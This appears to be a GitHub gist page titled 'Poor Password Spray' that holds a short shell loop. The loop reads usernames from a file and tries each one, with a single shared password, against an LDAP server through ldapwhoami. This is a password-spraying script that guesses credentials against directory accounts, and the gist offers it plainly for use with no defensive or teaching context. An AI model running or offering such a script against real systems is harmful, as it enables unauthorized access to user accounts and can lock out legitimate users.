Skip to content

Instantly share code, notes, and snippets.

@whoo
Last active April 3, 2023 19:43
Show Gist options
  • Save whoo/7dfaf46acab34aa6c7abd35215a828c1 to your computer and use it in GitHub Desktop.
Save whoo/7dfaf46acab34aa6c7abd35215a828c1 to your computer and use it in GitHub Desktop.
Poor Password Spray
cat list.txt | while read a
do
ldapwhoami -vvv -h 1... -D "$a@domain.com" -w '__PASSWORD__'
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment